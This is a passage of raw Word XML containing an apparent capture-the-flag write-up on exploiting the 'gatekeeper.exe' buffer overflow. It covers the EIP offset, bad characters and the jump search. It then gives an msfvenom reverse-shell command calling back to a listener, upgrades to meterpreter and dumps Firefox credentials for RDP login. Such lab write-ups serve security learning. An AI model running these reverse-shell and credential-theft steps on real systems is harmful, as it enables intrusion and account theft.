      </w:r>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009105CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503220D3" wp14:editId="6BC7DA51">
            <wp:extent cx="3772426" cy="74305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5CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After 116 bytes the EIP will get access. We try this with making 146 “A” and then 4 x “B”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009105CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172CCF24" wp14:editId="16ACDA1D">
            <wp:extent cx="5731510" cy="39433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5CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009105CD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B983D5C" wp14:editId="5017480B">
            <wp:extent cx="2267266" cy="26483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5CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>42424242 EIP = hex for BBBB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next we need to test for bad characters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="009105CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>But first we will create a simple python script to assist us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009105CD" w:rsidRDefault="003360EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003360EA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CADEF88" wp14:editId="194BCC20">
            <wp:extent cx="5731510" cy="533908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0EA" w:rsidRDefault="003360EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003360EA" w:rsidRDefault="003360EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This script allows us to test for bad characters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003360EA" w:rsidRDefault="003360EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Following the ESP dump, we found that \x00, the default, is the only bad character.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003360EA" w:rsidRDefault="003360EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> modules to locate a file that has all the security as false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003360EA" w:rsidRDefault="003360EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The gatekeeper.exe file </w:t>
      </w:r>
      <w:r w:rsidR="00AF67F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has 3 of the 4 set to false and we will use that to find the jump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF67F4" w:rsidRDefault="00AF67F4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="9912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7F4" w:rsidRDefault="00AF67F4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF67F4" w:rsidRDefault="00AF67F4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="41338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0EA" w:rsidRDefault="003360EA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00AF67F4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We also find the jump point</w:t>
      </w:r>
      <w:r w:rsidR="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and able to execute at this point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D7E8B76" wp14:editId="65232238">
            <wp:extent cx="5731510" cy="4070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F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next we can create a reverse shell payload, and add to the code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To create a revers shell to the local IP box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.0.21 LPORT=1234 -b "\x00\x0a" -f c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="524B2649" wp14:editId="09C742D2">
            <wp:extent cx="5731510" cy="401320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F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Then add the payload into the scrip, run it together with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener on port 123 on my attack system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This results in a reverse shell back </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Full script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43F41399" wp14:editId="7E46462E">
            <wp:extent cx="5731510" cy="67075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F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00354F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34DED371" wp14:editId="53628461">
            <wp:extent cx="5239481" cy="135273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F37" w:rsidRDefault="00354F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D3312" w:rsidRDefault="007D3312">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next we change the payload for the tunnel link to the actual gatekeeper server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D3312" w:rsidRDefault="007D3312">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the payload to the script, including the new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 of the target gatekeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D3312" w:rsidRDefault="007D3312">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener and execute the script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D3312" w:rsidRDefault="007D3312">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We get a reverse shell to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>natbat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007D3312" w:rsidRDefault="007D3312">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3312">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F8771C8" wp14:editId="619C53F5">
            <wp:extent cx="5477639" cy="140989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12" w:rsidRDefault="007D3312">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3312">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D715953" wp14:editId="7164C3D5">
            <wp:extent cx="5731510" cy="129159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12" w:rsidRDefault="007D3312">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D3312" w:rsidRDefault="00B90C25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After searching through the system we could not find more to upgrade privilege escalations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90C25" w:rsidRDefault="00B90C25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">So our next step is to change the reverse shell to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell, requiring an update to the script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90C25" w:rsidRDefault="00B90C25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We then started a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90C25" w:rsidRDefault="00B90C25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90C25">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D70915E" wp14:editId="64B122EF">
            <wp:extent cx="5731510" cy="32194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C25" w:rsidRDefault="00956B2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956B2E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6228E1A2" wp14:editId="1F5FD34E">
            <wp:extent cx="5731510" cy="5523230"/>
            <wp:effectExtent l="0" t="0" r="254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B2E" w:rsidRDefault="00956B2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00956B2E" w:rsidRDefault="00956B2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956B2E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EADF353" wp14:editId="6E3361B4">
            <wp:extent cx="5731510" cy="447357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B2E" w:rsidRDefault="00956B2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00956B2E" w:rsidRDefault="00956B2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> has an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956B2E" w:rsidRDefault="00956B2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956B2E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13F6C40B" wp14:editId="4AB42995">
            <wp:extent cx="5731510" cy="25590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B2E" w:rsidRDefault="00956B2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6E3D" w:rsidRDefault="00AB6E3D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Seeing Mozilla Firefox means we can try the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creds utility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB6E3D" w:rsidRDefault="00AB6E3D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35886644" wp14:editId="5A01D598">
            <wp:extent cx="5731510" cy="1254760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CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> decrypt tool that can be found here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="005008CF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/unode/firefox_decrypt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We copies the files from the loot to their original file names and ran the script, and found a username and password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000852CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52EF7F62" wp14:editId="3E05AF8F">
            <wp:extent cx="5731510" cy="1558925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CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000852CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63606699" wp14:editId="2A582A61">
            <wp:extent cx="5731510" cy="10287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CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we used the details to start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rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000852CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D0A88CE" wp14:editId="2224DF9C">
            <wp:extent cx="5731510" cy="2940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CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000852CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0418470D" wp14:editId="1FC9789A">
            <wp:extent cx="5731510" cy="182626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CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000852CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CA22FE6" wp14:editId="67B2CA46">
            <wp:extent cx="5731510" cy="19665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CA" w:rsidRDefault="000852CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000852CA" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The initial enumeration found an open SMB share with access to the gatekeeper.exe file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A450CD" w:rsidRDefault="00A450CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
